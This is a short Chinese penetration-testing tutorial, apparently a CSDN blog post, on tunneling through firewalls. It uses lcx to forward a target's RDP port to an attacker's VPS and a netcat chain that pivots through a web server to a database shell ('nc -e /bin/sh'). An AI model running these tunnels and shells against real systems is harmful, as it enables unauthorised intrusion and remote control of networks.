内网渗透--建立隐藏通信隧道

本文介绍了在内网渗透中如何利用LCX和NC进行端口转发,以绕过防火墙限制。通过LCX工具进行内网端口转发和本地端口映射,实现对目标服务器的远程访问。同时,利用NC代理转发,通过边界机与内网数据库建立通信。这些技术在网络安全测试和漏洞利用中具有重要作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

传输层隧道技术

传输层技术包括TCP 隧道、UDP 隧道、和常见的端口转发等。在渗透测试中,如果内网防火墙阻止了对指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口。

1、lcx 端口转发

LCX是一个基于socket 套接字实现的端口转发工具。windows版本为lcx.exe,Linux 版本为 portmap。

1.1 内网端口转发
在目标机器上执行如下命令,将目标机器3389端口的所有数据转发到公网vps的4444 端口上
lcx.exe -slave 公网主机IP  4444 127.0.0.1 3389
在vps 上执行如下命令,将本机4444端口上监听的所有数据转发到本机的5555 端口上。
lcx.exe -listen 4444 5555
此时,我们使用 mstsc 连接 <公网IP地址>:5555,即可访问目标服务器的3389端口。
1.2 本地端口映射
如果目标主机的部分端口(如3389)被防火墙拦截时,我们可以通过目标主机相应端口的数据传到防火墙允许的其他端口(如53)。
在目标主机上执行如下命令,就可以直接从远程桌面连接到目标主机的53端口了。
lcx.exe -tran <目标主机IP地址> 3389

2、NC 代理转发

通过边界机作代理,使kali与数据库通信,访问内网数据库:

攻击机:192.136.100.111 (公网IP)
WEB边界机:192.168.1.100 10.10.10.100
内网数据库:10.10.10.200

攻击机执行:
nc -lvp 3333
数据库执行:
nc -lvp 3333 -e /bin/sh
web服务器执行:
nc -v 192.136.100.111 3333 -c "nc -v 10.10.10.200 3333"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值